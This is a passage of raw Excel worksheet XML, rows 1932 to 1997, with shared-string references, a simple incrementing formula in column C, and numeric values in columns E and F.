      <c r="E1932">
        <v>4.3369680643081672E-2</v>
      </c>
      <c r="F1932">
        <v>2</v>
      </c>
    </row>
    <row r="1933" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1933" t="s">
        <v>3728</v>
      </c>
      <c r="B1933" t="s">
        <v>3729</v>
      </c>
      <c r="C1933">
        <f t="shared" si="30"/>
        <v>11850984</v>
      </c>
      <c r="D1933" t="s">
        <v>3730</v>
      </c>
      <c r="E1933">
        <v>33.364948272705078</v>
      </c>
      <c r="F1933">
        <v>1</v>
      </c>
    </row>
    <row r="1934" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1934" t="s">
        <v>3728</v>
      </c>
      <c r="B1934" t="s">
        <v>3729</v>
      </c>
      <c r="C1934">
        <f t="shared" si="30"/>
        <v>11852237</v>
      </c>
      <c r="D1934" t="s">
        <v>3731</v>
      </c>
      <c r="E1934">
        <v>5.6969590187072754</v>
      </c>
      <c r="F1934">
        <v>2</v>
      </c>
    </row>
    <row r="1935" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1935" t="s">
        <v>3732</v>
      </c>
      <c r="B1935" t="s">
        <v>3733</v>
      </c>
      <c r="C1935">
        <f t="shared" si="30"/>
        <v>11853490</v>
      </c>
      <c r="D1935" t="s">
        <v>3630</v>
      </c>
      <c r="E1935">
        <v>12.86751651763916</v>
      </c>
      <c r="F1935">
        <v>1</v>
      </c>
    </row>
    <row r="1936" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1936" t="s">
        <v>3732</v>
      </c>
      <c r="B1936" t="s">
        <v>3733</v>
      </c>
      <c r="C1936">
        <f t="shared" si="30"/>
        <v>11854743</v>
      </c>
      <c r="D1936" t="s">
        <v>3734</v>
      </c>
      <c r="E1936">
        <v>3.797669649124146</v>
      </c>
      <c r="F1936">
        <v>2</v>
      </c>
    </row>
    <row r="1937" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1937" t="s">
        <v>3735</v>
      </c>
      <c r="B1937" t="s">
        <v>3736</v>
      </c>
      <c r="C1937">
        <f t="shared" si="30"/>
        <v>11855996</v>
      </c>
      <c r="D1937" t="s">
        <v>3737</v>
      </c>
      <c r="E1937">
        <v>26.33329963684082</v>
      </c>
      <c r="F1937">
        <v>1</v>
      </c>
    </row>
    <row r="1938" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1938" t="s">
        <v>3735</v>
      </c>
      <c r="B1938" t="s">
        <v>3736</v>
      </c>
      <c r="C1938">
        <f t="shared" si="30"/>
        <v>11857249</v>
      </c>
      <c r="D1938" t="s">
        <v>3738</v>
      </c>
      <c r="E1938">
        <v>3.759610652923584</v>
      </c>
      <c r="F1938">
        <v>2</v>
      </c>
    </row>
    <row r="1939" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1939" t="s">
        <v>3739</v>
      </c>
      <c r="B1939" t="s">
        <v>3740</v>
      </c>
      <c r="C1939">
        <f t="shared" si="30"/>
        <v>11858502</v>
      </c>
      <c r="D1939" t="s">
        <v>3741</v>
      </c>
      <c r="E1939">
        <v>26.232162475585941</v>
      </c>
      <c r="F1939">
        <v>1</v>
      </c>
    </row>
    <row r="1940" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1940" t="s">
        <v>3739</v>
      </c>
      <c r="B1940" t="s">
        <v>3740</v>
      </c>
      <c r="C1940">
        <f t="shared" si="30"/>
        <v>11859755</v>
      </c>
      <c r="D1940" t="s">
        <v>3742</v>
      </c>
      <c r="E1940">
        <v>2.7614314556121831</v>
      </c>
      <c r="F1940">
        <v>2</v>
      </c>
    </row>
    <row r="1941" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1941" t="s">
        <v>3743</v>
      </c>
      <c r="B1941" t="s">
        <v>3744</v>
      </c>
      <c r="C1941">
        <f t="shared" si="30"/>
        <v>11861008</v>
      </c>
      <c r="D1941" t="s">
        <v>3745</v>
      </c>
      <c r="E1941">
        <v>18.54095458984375</v>
      </c>
      <c r="F1941">
        <v>1</v>
      </c>
    </row>
    <row r="1942" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1942" t="s">
        <v>3743</v>
      </c>
      <c r="B1942" t="s">
        <v>3744</v>
      </c>
      <c r="C1942">
        <f t="shared" si="30"/>
        <v>11862261</v>
      </c>
      <c r="D1942" t="s">
        <v>3746</v>
      </c>
      <c r="E1942">
        <v>15.15714168548584</v>
      </c>
      <c r="F1942">
        <v>2</v>
      </c>
    </row>
    <row r="1943" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1943" t="s">
        <v>3747</v>
      </c>
      <c r="B1943" t="s">
        <v>3748</v>
      </c>
      <c r="C1943">
        <f t="shared" si="30"/>
        <v>11863514</v>
      </c>
      <c r="D1943" t="s">
        <v>3749</v>
      </c>
      <c r="E1943">
        <v>22.637664794921879</v>
      </c>
      <c r="F1943">
        <v>1</v>
      </c>
    </row>
    <row r="1944" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1944" t="s">
        <v>3747</v>
      </c>
      <c r="B1944" t="s">
        <v>3748</v>
      </c>
      <c r="C1944">
        <f t="shared" si="30"/>
        <v>11864767</v>
      </c>
      <c r="D1944" t="s">
        <v>3750</v>
      </c>
      <c r="E1944">
        <v>19.696416854858398</v>
      </c>
      <c r="F1944">
        <v>2</v>
      </c>
    </row>
    <row r="1945" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1945" t="s">
        <v>3751</v>
      </c>
      <c r="B1945" t="s">
        <v>3752</v>
      </c>
      <c r="C1945">
        <f t="shared" si="30"/>
        <v>11866020</v>
      </c>
      <c r="D1945" t="s">
        <v>3753</v>
      </c>
      <c r="E1945">
        <v>28.464599609375</v>
      </c>
      <c r="F1945">
        <v>1</v>
      </c>
    </row>
    <row r="1946" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1946" t="s">
        <v>3751</v>
      </c>
      <c r="B1946" t="s">
        <v>3752</v>
      </c>
      <c r="C1946">
        <f t="shared" si="30"/>
        <v>11867273</v>
      </c>
      <c r="D1946" t="s">
        <v>3754</v>
      </c>
      <c r="E1946">
        <v>4.6920919418334961</v>
      </c>
      <c r="F1946">
        <v>2</v>
      </c>
    </row>
    <row r="1947" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1947" t="s">
        <v>3755</v>
      </c>
      <c r="B1947" t="s">
        <v>3756</v>
      </c>
      <c r="C1947">
        <f t="shared" si="30"/>
        <v>11868526</v>
      </c>
      <c r="D1947" t="s">
        <v>3757</v>
      </c>
      <c r="E1947">
        <v>29.617683410644531</v>
      </c>
      <c r="F1947">
        <v>1</v>
      </c>
    </row>
    <row r="1948" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1948" t="s">
        <v>3755</v>
      </c>
      <c r="B1948" t="s">
        <v>3756</v>
      </c>
      <c r="C1948">
        <f t="shared" si="30"/>
        <v>11869779</v>
      </c>
      <c r="D1948" t="s">
        <v>3758</v>
      </c>
      <c r="E1948">
        <v>6.8929705619812012</v>
      </c>
      <c r="F1948">
        <v>2</v>
      </c>
    </row>
    <row r="1949" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1949" t="s">
        <v>3759</v>
      </c>
      <c r="B1949" t="s">
        <v>3760</v>
      </c>
      <c r="C1949">
        <f t="shared" si="30"/>
        <v>11871032</v>
      </c>
      <c r="D1949" t="s">
        <v>3761</v>
      </c>
      <c r="E1949">
        <v>30.737306594848629</v>
      </c>
      <c r="F1949">
        <v>1</v>
      </c>
    </row>
    <row r="1950" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1950" t="s">
        <v>3759</v>
      </c>
      <c r="B1950" t="s">
        <v>3760</v>
      </c>
      <c r="C1950">
        <f t="shared" si="30"/>
        <v>11872285</v>
      </c>
      <c r="D1950" t="s">
        <v>3762</v>
      </c>
      <c r="E1950">
        <v>2.8457093238830571</v>
      </c>
      <c r="F1950">
        <v>2</v>
      </c>
    </row>
    <row r="1951" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1951" t="s">
        <v>3763</v>
      </c>
      <c r="B1951" t="s">
        <v>3764</v>
      </c>
      <c r="C1951">
        <f t="shared" si="30"/>
        <v>11873538</v>
      </c>
      <c r="D1951" t="s">
        <v>3765</v>
      </c>
      <c r="E1951">
        <v>28.731399536132809</v>
      </c>
      <c r="F1951">
        <v>1</v>
      </c>
    </row>
    <row r="1952" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1952" t="s">
        <v>3763</v>
      </c>
      <c r="B1952" t="s">
        <v>3764</v>
      </c>
      <c r="C1952">
        <f t="shared" si="30"/>
        <v>11874791</v>
      </c>
      <c r="D1952" t="s">
        <v>3766</v>
      </c>
      <c r="E1952">
        <v>11.04258441925049</v>
      </c>
      <c r="F1952">
        <v>2</v>
      </c>
    </row>
    <row r="1953" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1953" t="s">
        <v>3767</v>
      </c>
      <c r="B1953" t="s">
        <v>3768</v>
      </c>
      <c r="C1953">
        <f t="shared" si="30"/>
        <v>11876044</v>
      </c>
      <c r="D1953" t="s">
        <v>3769</v>
      </c>
      <c r="E1953">
        <v>37.245140075683587</v>
      </c>
      <c r="F1953">
        <v>1</v>
      </c>
    </row>
    <row r="1954" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1954" t="s">
        <v>3767</v>
      </c>
      <c r="B1954" t="s">
        <v>3768</v>
      </c>
      <c r="C1954">
        <f t="shared" si="30"/>
        <v>11877297</v>
      </c>
      <c r="D1954" t="s">
        <v>3770</v>
      </c>
      <c r="E1954">
        <v>3.9849034510552883E-3</v>
      </c>
      <c r="F1954">
        <v>2</v>
      </c>
    </row>
    <row r="1955" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1955" t="s">
        <v>3771</v>
      </c>
      <c r="B1955" t="s">
        <v>3772</v>
      </c>
      <c r="C1955">
        <f t="shared" si="30"/>
        <v>11878550</v>
      </c>
      <c r="D1955" t="s">
        <v>3773</v>
      </c>
      <c r="E1955">
        <v>25.557552337646481</v>
      </c>
      <c r="F1955">
        <v>1</v>
      </c>
    </row>
    <row r="1956" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1956" t="s">
        <v>3771</v>
      </c>
      <c r="B1956" t="s">
        <v>3772</v>
      </c>
      <c r="C1956">
        <f t="shared" si="30"/>
        <v>11879803</v>
      </c>
      <c r="D1956" t="s">
        <v>3774</v>
      </c>
      <c r="E1956">
        <v>14.55103969573975</v>
      </c>
      <c r="F1956">
        <v>2</v>
      </c>
    </row>
    <row r="1957" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1957" t="s">
        <v>3775</v>
      </c>
      <c r="B1957" t="s">
        <v>3776</v>
      </c>
      <c r="C1957">
        <f t="shared" si="30"/>
        <v>11881056</v>
      </c>
      <c r="D1957" t="s">
        <v>3634</v>
      </c>
      <c r="E1957">
        <v>29.152912139892582</v>
      </c>
      <c r="F1957">
        <v>1</v>
      </c>
    </row>
    <row r="1958" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1958" t="s">
        <v>3775</v>
      </c>
      <c r="B1958" t="s">
        <v>3776</v>
      </c>
      <c r="C1958">
        <f t="shared" si="30"/>
        <v>11882309</v>
      </c>
      <c r="D1958" t="s">
        <v>3777</v>
      </c>
      <c r="E1958">
        <v>8.1014213562011719</v>
      </c>
      <c r="F1958">
        <v>2</v>
      </c>
    </row>
    <row r="1959" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1959" t="s">
        <v>3778</v>
      </c>
      <c r="B1959" t="s">
        <v>3779</v>
      </c>
      <c r="C1959">
        <f t="shared" si="30"/>
        <v>11883562</v>
      </c>
      <c r="D1959" t="s">
        <v>3741</v>
      </c>
      <c r="E1959">
        <v>26.302299499511719</v>
      </c>
      <c r="F1959">
        <v>1</v>
      </c>
    </row>
    <row r="1960" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1960" t="s">
        <v>3778</v>
      </c>
      <c r="B1960" t="s">
        <v>3779</v>
      </c>
      <c r="C1960">
        <f t="shared" si="30"/>
        <v>11884815</v>
      </c>
      <c r="D1960" t="s">
        <v>3780</v>
      </c>
      <c r="E1960">
        <v>3.5570719242095952</v>
      </c>
      <c r="F1960">
        <v>2</v>
      </c>
    </row>
    <row r="1961" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1961" t="s">
        <v>3781</v>
      </c>
      <c r="B1961" t="s">
        <v>3782</v>
      </c>
      <c r="C1961">
        <f t="shared" si="30"/>
        <v>11886068</v>
      </c>
      <c r="D1961" t="s">
        <v>3783</v>
      </c>
      <c r="E1961">
        <v>33.371372222900391</v>
      </c>
      <c r="F1961">
        <v>1</v>
      </c>
    </row>
    <row r="1962" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1962" t="s">
        <v>3781</v>
      </c>
      <c r="B1962" t="s">
        <v>3782</v>
      </c>
      <c r="C1962">
        <f t="shared" si="30"/>
        <v>11887321</v>
      </c>
      <c r="D1962" t="s">
        <v>3784</v>
      </c>
      <c r="E1962">
        <v>3.4318442344665532</v>
      </c>
      <c r="F1962">
        <v>2</v>
      </c>
    </row>
    <row r="1963" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1963" t="s">
        <v>3785</v>
      </c>
      <c r="B1963" t="s">
        <v>3786</v>
      </c>
      <c r="C1963">
        <f t="shared" si="30"/>
        <v>11888574</v>
      </c>
      <c r="D1963" t="s">
        <v>3787</v>
      </c>
      <c r="E1963">
        <v>21.639297485351559</v>
      </c>
      <c r="F1963">
        <v>1</v>
      </c>
    </row>
    <row r="1964" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1964" t="s">
        <v>3785</v>
      </c>
      <c r="B1964" t="s">
        <v>3786</v>
      </c>
      <c r="C1964">
        <f t="shared" si="30"/>
        <v>11889827</v>
      </c>
      <c r="D1964" t="s">
        <v>3788</v>
      </c>
      <c r="E1964">
        <v>5.6736207008361816</v>
      </c>
      <c r="F1964">
        <v>2</v>
      </c>
    </row>
    <row r="1965" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1965" t="s">
        <v>3789</v>
      </c>
      <c r="B1965" t="s">
        <v>3790</v>
      </c>
      <c r="C1965">
        <f t="shared" si="30"/>
        <v>11891080</v>
      </c>
      <c r="D1965" t="s">
        <v>3791</v>
      </c>
      <c r="E1965">
        <v>27.470438003540039</v>
      </c>
      <c r="F1965">
        <v>1</v>
      </c>
    </row>
    <row r="1966" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1966" t="s">
        <v>3789</v>
      </c>
      <c r="B1966" t="s">
        <v>3790</v>
      </c>
      <c r="C1966">
        <f t="shared" si="30"/>
        <v>11892333</v>
      </c>
      <c r="D1966" t="s">
        <v>3792</v>
      </c>
      <c r="E1966">
        <v>0.10081165283918379</v>
      </c>
      <c r="F1966">
        <v>2</v>
      </c>
    </row>
    <row r="1967" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1967" t="s">
        <v>3793</v>
      </c>
      <c r="B1967" t="s">
        <v>3794</v>
      </c>
      <c r="C1967">
        <f t="shared" si="30"/>
        <v>11893586</v>
      </c>
      <c r="D1967" t="s">
        <v>3795</v>
      </c>
      <c r="E1967">
        <v>36.744022369384773</v>
      </c>
      <c r="F1967">
        <v>1</v>
      </c>
    </row>
    <row r="1968" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1968" t="s">
        <v>3793</v>
      </c>
      <c r="B1968" t="s">
        <v>3794</v>
      </c>
      <c r="C1968">
        <f t="shared" si="30"/>
        <v>11894839</v>
      </c>
      <c r="D1968" t="s">
        <v>3796</v>
      </c>
      <c r="E1968">
        <v>4.5196776390075684</v>
      </c>
      <c r="F1968">
        <v>2</v>
      </c>
    </row>
    <row r="1969" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1969" t="s">
        <v>3797</v>
      </c>
      <c r="B1969" t="s">
        <v>3798</v>
      </c>
      <c r="C1969">
        <f t="shared" si="30"/>
        <v>11896092</v>
      </c>
      <c r="D1969" t="s">
        <v>3799</v>
      </c>
      <c r="E1969">
        <v>25.410543441772461</v>
      </c>
      <c r="F1969">
        <v>1</v>
      </c>
    </row>
    <row r="1970" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1970" t="s">
        <v>3797</v>
      </c>
      <c r="B1970" t="s">
        <v>3798</v>
      </c>
      <c r="C1970">
        <f t="shared" si="30"/>
        <v>11897345</v>
      </c>
      <c r="D1970" t="s">
        <v>3800</v>
      </c>
      <c r="E1970">
        <v>0.7557099461555481</v>
      </c>
      <c r="F1970">
        <v>2</v>
      </c>
    </row>
    <row r="1971" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1971" t="s">
        <v>3801</v>
      </c>
      <c r="B1971" t="s">
        <v>3802</v>
      </c>
      <c r="C1971">
        <f t="shared" si="30"/>
        <v>11898598</v>
      </c>
      <c r="D1971" t="s">
        <v>3803</v>
      </c>
      <c r="E1971">
        <v>20.899860382080082</v>
      </c>
      <c r="F1971">
        <v>1</v>
      </c>
    </row>
    <row r="1972" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1972" t="s">
        <v>3801</v>
      </c>
      <c r="B1972" t="s">
        <v>3802</v>
      </c>
      <c r="C1972">
        <f t="shared" si="30"/>
        <v>11899851</v>
      </c>
      <c r="D1972" t="s">
        <v>3804</v>
      </c>
      <c r="E1972">
        <v>16.018575668334961</v>
      </c>
      <c r="F1972">
        <v>2</v>
      </c>
    </row>
    <row r="1973" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1973" t="s">
        <v>3805</v>
      </c>
      <c r="B1973" t="s">
        <v>3806</v>
      </c>
      <c r="C1973">
        <f t="shared" si="30"/>
        <v>11901104</v>
      </c>
      <c r="D1973" t="s">
        <v>3807</v>
      </c>
      <c r="E1973">
        <v>21.648870468139648</v>
      </c>
      <c r="F1973">
        <v>1</v>
      </c>
    </row>
    <row r="1974" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1974" t="s">
        <v>3805</v>
      </c>
      <c r="B1974" t="s">
        <v>3806</v>
      </c>
      <c r="C1974">
        <f t="shared" si="30"/>
        <v>11902357</v>
      </c>
      <c r="D1974" t="s">
        <v>3808</v>
      </c>
      <c r="E1974">
        <v>9.7893590927124023</v>
      </c>
      <c r="F1974">
        <v>2</v>
      </c>
    </row>
    <row r="1975" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1975" t="s">
        <v>3809</v>
      </c>
      <c r="B1975" t="s">
        <v>3810</v>
      </c>
      <c r="C1975">
        <f t="shared" si="30"/>
        <v>11903610</v>
      </c>
      <c r="D1975" t="s">
        <v>3811</v>
      </c>
      <c r="E1975">
        <v>21.733671188354489</v>
      </c>
      <c r="F1975">
        <v>1</v>
      </c>
    </row>
    <row r="1976" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1976" t="s">
        <v>3809</v>
      </c>
      <c r="B1976" t="s">
        <v>3810</v>
      </c>
      <c r="C1976">
        <f t="shared" si="30"/>
        <v>11904863</v>
      </c>
      <c r="D1976" t="s">
        <v>3812</v>
      </c>
      <c r="E1976">
        <v>13.11746311187744</v>
      </c>
      <c r="F1976">
        <v>2</v>
      </c>
    </row>
    <row r="1977" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1977" t="s">
        <v>3813</v>
      </c>
      <c r="B1977" t="s">
        <v>3814</v>
      </c>
      <c r="C1977">
        <f t="shared" si="30"/>
        <v>11906116</v>
      </c>
      <c r="D1977" t="s">
        <v>3815</v>
      </c>
      <c r="E1977">
        <v>19.715362548828121</v>
      </c>
      <c r="F1977">
        <v>1</v>
      </c>
    </row>
    <row r="1978" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1978" t="s">
        <v>3813</v>
      </c>
      <c r="B1978" t="s">
        <v>3814</v>
      </c>
      <c r="C1978">
        <f t="shared" si="30"/>
        <v>11907369</v>
      </c>
      <c r="D1978" t="s">
        <v>3816</v>
      </c>
      <c r="E1978">
        <v>12.95600700378418</v>
      </c>
      <c r="F1978">
        <v>2</v>
      </c>
    </row>
    <row r="1979" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1979" t="s">
        <v>3817</v>
      </c>
      <c r="B1979" t="s">
        <v>3818</v>
      </c>
      <c r="C1979">
        <f t="shared" si="30"/>
        <v>11908622</v>
      </c>
      <c r="D1979" t="s">
        <v>3819</v>
      </c>
      <c r="E1979">
        <v>33.006523132324219</v>
      </c>
      <c r="F1979">
        <v>1</v>
      </c>
    </row>
    <row r="1980" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1980" t="s">
        <v>3817</v>
      </c>
      <c r="B1980" t="s">
        <v>3818</v>
      </c>
      <c r="C1980">
        <f t="shared" si="30"/>
        <v>11909875</v>
      </c>
      <c r="D1980" t="s">
        <v>3820</v>
      </c>
      <c r="E1980">
        <v>4.9263968467712402</v>
      </c>
      <c r="F1980">
        <v>2</v>
      </c>
    </row>
    <row r="1981" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1981" t="s">
        <v>3821</v>
      </c>
      <c r="B1981" t="s">
        <v>3822</v>
      </c>
      <c r="C1981">
        <f t="shared" si="30"/>
        <v>11911128</v>
      </c>
      <c r="D1981" t="s">
        <v>3823</v>
      </c>
      <c r="E1981">
        <v>21.877218246459961</v>
      </c>
      <c r="F1981">
        <v>1</v>
      </c>
    </row>
    <row r="1982" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1982" t="s">
        <v>3821</v>
      </c>
      <c r="B1982" t="s">
        <v>3822</v>
      </c>
      <c r="C1982">
        <f t="shared" si="30"/>
        <v>11912381</v>
      </c>
      <c r="D1982" t="s">
        <v>3824</v>
      </c>
      <c r="E1982">
        <v>1.5059517621994021</v>
      </c>
      <c r="F1982">
        <v>2</v>
      </c>
    </row>
    <row r="1983" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1983" t="s">
        <v>3825</v>
      </c>
      <c r="B1983" t="s">
        <v>3826</v>
      </c>
      <c r="C1983">
        <f t="shared" si="30"/>
        <v>11913634</v>
      </c>
      <c r="D1983" t="s">
        <v>3827</v>
      </c>
      <c r="E1983">
        <v>24.56288909912109</v>
      </c>
      <c r="F1983">
        <v>1</v>
      </c>
    </row>
    <row r="1984" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1984" t="s">
        <v>3825</v>
      </c>
      <c r="B1984" t="s">
        <v>3826</v>
      </c>
      <c r="C1984">
        <f t="shared" si="30"/>
        <v>11914887</v>
      </c>
      <c r="D1984" t="s">
        <v>3828</v>
      </c>
      <c r="E1984">
        <v>11.22183322906494</v>
      </c>
      <c r="F1984">
        <v>2</v>
      </c>
    </row>
    <row r="1985" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1985" t="s">
        <v>3829</v>
      </c>
      <c r="B1985" t="s">
        <v>3830</v>
      </c>
      <c r="C1985">
        <f t="shared" si="30"/>
        <v>11916140</v>
      </c>
      <c r="D1985" t="s">
        <v>3831</v>
      </c>
      <c r="E1985">
        <v>29.7950325012207</v>
      </c>
      <c r="F1985">
        <v>1</v>
      </c>
    </row>
    <row r="1986" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1986" t="s">
        <v>3829</v>
      </c>
      <c r="B1986" t="s">
        <v>3830</v>
      </c>
      <c r="C1986">
        <f t="shared" si="30"/>
        <v>11917393</v>
      </c>
      <c r="D1986" t="s">
        <v>3832</v>
      </c>
      <c r="E1986">
        <v>12.59615516662598</v>
      </c>
      <c r="F1986">
        <v>2</v>
      </c>
    </row>
    <row r="1987" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1987" t="s">
        <v>3833</v>
      </c>
      <c r="B1987" t="s">
        <v>3834</v>
      </c>
      <c r="C1987">
        <f t="shared" si="30"/>
        <v>11918646</v>
      </c>
      <c r="D1987" t="s">
        <v>3835</v>
      </c>
      <c r="E1987">
        <v>28.869918823242191</v>
      </c>
      <c r="F1987">
        <v>1</v>
      </c>
    </row>
    <row r="1988" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1988" t="s">
        <v>3833</v>
      </c>
      <c r="B1988" t="s">
        <v>3834</v>
      </c>
      <c r="C1988">
        <f t="shared" si="30"/>
        <v>11919899</v>
      </c>
      <c r="D1988" t="s">
        <v>3836</v>
      </c>
      <c r="E1988">
        <v>14.50362586975098</v>
      </c>
      <c r="F1988">
        <v>2</v>
      </c>
    </row>
    <row r="1989" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1989" t="s">
        <v>3837</v>
      </c>
      <c r="B1989" t="s">
        <v>3838</v>
      </c>
      <c r="C1989">
        <f t="shared" si="30"/>
        <v>11921152</v>
      </c>
      <c r="D1989" t="s">
        <v>3839</v>
      </c>
      <c r="E1989">
        <v>24.513706207275391</v>
      </c>
      <c r="F1989">
        <v>1</v>
      </c>
    </row>
    <row r="1990" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1990" t="s">
        <v>3837</v>
      </c>
      <c r="B1990" t="s">
        <v>3838</v>
      </c>
      <c r="C1990">
        <f t="shared" si="30"/>
        <v>11922405</v>
      </c>
      <c r="D1990" t="s">
        <v>3840</v>
      </c>
      <c r="E1990">
        <v>9.1474027633666992</v>
      </c>
      <c r="F1990">
        <v>2</v>
      </c>
    </row>
    <row r="1991" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1991" t="s">
        <v>3841</v>
      </c>
      <c r="B1991" t="s">
        <v>3842</v>
      </c>
      <c r="C1991">
        <f t="shared" si="30"/>
        <v>11923658</v>
      </c>
      <c r="D1991" t="s">
        <v>3843</v>
      </c>
      <c r="E1991">
        <v>21.447895050048832</v>
      </c>
      <c r="F1991">
        <v>1</v>
      </c>
    </row>
    <row r="1992" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1992" t="s">
        <v>3841</v>
      </c>
      <c r="B1992" t="s">
        <v>3842</v>
      </c>
      <c r="C1992">
        <f t="shared" si="30"/>
        <v>11924911</v>
      </c>
      <c r="D1992" t="s">
        <v>3844</v>
      </c>
      <c r="E1992">
        <v>7.9483647346496582</v>
      </c>
      <c r="F1992">
        <v>2</v>
      </c>
    </row>
    <row r="1993" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1993" t="s">
        <v>3845</v>
      </c>
      <c r="B1993" t="s">
        <v>3846</v>
      </c>
      <c r="C1993">
        <f t="shared" si="30"/>
        <v>11926164</v>
      </c>
      <c r="D1993" t="s">
        <v>3847</v>
      </c>
      <c r="E1993">
        <v>23.48807334899902</v>
      </c>
      <c r="F1993">
        <v>1</v>
      </c>
    </row>
    <row r="1994" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1994" t="s">
        <v>3845</v>
      </c>
      <c r="B1994" t="s">
        <v>3846</v>
      </c>
      <c r="C1994">
        <f t="shared" ref="C1994:C2010" si="31">C1993+1253</f>
        <v>11927417</v>
      </c>
      <c r="D1994" t="s">
        <v>3848</v>
      </c>
      <c r="E1994">
        <v>8.8660993576049805</v>
      </c>
      <c r="F1994">
        <v>2</v>
      </c>
    </row>
    <row r="1995" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1995" t="s">
        <v>3849</v>
      </c>
      <c r="B1995" t="s">
        <v>3850</v>
      </c>
      <c r="C1995">
        <f t="shared" si="31"/>
        <v>11928670</v>
      </c>
      <c r="D1995" t="s">
        <v>3851</v>
      </c>
      <c r="E1995">
        <v>29.072429656982418</v>
      </c>
      <c r="F1995">
        <v>1</v>
      </c>
    </row>
    <row r="1996" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1996" t="s">
        <v>3849</v>
      </c>
      <c r="B1996" t="s">
        <v>3850</v>
      </c>
      <c r="C1996">
        <f t="shared" si="31"/>
        <v>11929923</v>
      </c>
      <c r="D1996" t="s">
        <v>3852</v>
      </c>
      <c r="E1996">
        <v>8.433659553527832</v>
      </c>
      <c r="F1996">
        <v>2</v>
      </c>
    </row>
    <row r="1997" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1997" t="s">
        <v>3853</v>
      </c>
      <c r="B1997" t="s">
        <v>3854</v>
      </c>
      <c r="C1997">
        <f t="shared" si="31"/>
        <v>11931176</v>
      </c>
      <c r="D1997" t="s">
        <v>3855</v>
      </c>
